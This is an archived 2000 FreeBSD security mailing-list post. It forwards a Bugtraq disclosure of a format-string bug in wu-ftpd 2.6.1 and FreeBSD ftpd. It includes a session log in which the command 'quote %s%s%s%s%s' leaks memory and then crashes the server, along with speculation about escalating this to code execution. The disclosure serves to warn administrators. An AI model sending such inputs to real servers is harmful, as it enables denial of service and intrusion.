From owner-freebsd-security Mon Oct 2 11:18:51 2000 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id 8C0ED37B66C for ; Mon, 2 Oct 2000 11:18:43 -0700 (PDT) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id MAA07584 for ; Mon, 2 Oct 2000 12:18:32 -0600 (MDT) Message-Id: <4.3.2.7.2.20001002113441.04932240@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Mon, 02 Oct 2000 12:18:25 -0600 To: security@FreeBSD.ORG From: Brett Glass Subject: ftpd bug in FreeBSD through at least 3.4 Mime-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I've received LOTS of anonymous FTP login attempts on the FreeBSD boxen I administer, and have been wondering why. Perhaps this message explains it! The below works on all 2.x versions of FreeBSD, and in the 3.x branch up until at least 3.4-RELEASE (maybe later). Am not sure to what extent this bug can be exploited. At best, it would probably just let someone run things as the user "ftp" (the euid used for anonymous FTP logins). This might make it possible to finesse a known local root exploit into a remote one, and/or to start an automated password cracking process (a la the RTM worm) on the system. At worst, it might be possible to parlay it into something worse. --Brett >Approved-By: aleph1@SECURITYFOCUS.COM >Delivered-To: bugtraq@lists.securityfocus.com >Received: from securityfocus.com (mail.securityfocus.com [207.126.127.78]) by > lists.securityfocus.com (Postfix) with SMTP id 259D024C7F5 for > ; Mon, 2 Oct 2000 08:27:37 -0700 > (PDT) >Received: (qmail 21295 invoked by alias); 2 Oct 2000 15:29:30 -0000 >Delivered-To: BUGTRAQ@SECURITYFOCUS.COM >Received: (qmail 21292 invoked from network); 2 Oct 2000 15:29:29 -0000 >Received: from unknown (HELO mail.multigroup-bg.com) (212.36.2.250) by > mail.securityfocus.com with SMTP; 2 Oct 2000 15:29:29 -0000 >Received: from mgoracle2000 ([192.168.32.220]) by mail.multigroup-bg.com > (8.9.3/8.9.3) with SMTP id SAA32372 for ; > Mon, 2 Oct 2000 18:28:32 +0300 >MIME-Version: 1.0 >Content-Type: text/plain; charset="iso-8859-1" >Content-Transfer-Encoding: 8bit >X-Priority: 3 >X-MSMail-Priority: Normal >X-Mailer: Microsoft Outlook Express 5.50.4133.2400 >X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 >Message-ID: <001301c02c8d$ca506090$dc20a8c0@mgoracle2000> >Date: Mon, 2 Oct 2000 18:28:26 +0200 >Reply-To: Javor Ninov >Sender: Bugtraq List >From: Javor Ninov >Organization: MG Bulgaria >Subject: Wu-ftpd 2.6.1(1) >To: BUGTRAQ@SECURITYFOCUS.COM >X-UIDL: 34a5d41e2d991fbaee20ab8924544a45 > >somewhere:/$ ftp 127.0.0.1 >Connected to 1127.0.0.1. >220 somewhere.in.internet FTP server (Version wu-2.6.1(1) Mon Jul 3 10:49:59 >EEST 2000) ready. >Name (0:somebody): ftp >331 Guest login ok, send your complete e-mail address as password. >Password: >230-Welcome, archive user! This is an experimental FTP server. If have any >230-unusual problems, please report them via e-mail to >root@somewhere.in.internet >230-If you do have problems, please try using a dash (-) as the first >character >230-of your password -- this will turn off the continuation messages that >may >230-be confusing your ftp client. >230- >230 Guest login ok, access restrictions apply. >Remote system type is UNIX. >Using binary mode to transfer files. >ftp> quote %s%s%s%s >500 'TP¿9(NULL)': command not understood. >ftp>quote %s%s%s%s%s >Segmentation fault >somewhere:/$ uname -a >Linux somewhere 2.2.12 #1 Sun Sep 19 13:35:59 EEST 1999 i686 unknown >somewhere:/$ >This is a Slackware 4.0 with last wuftpd.tgz ( 02-oct-2000 ) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message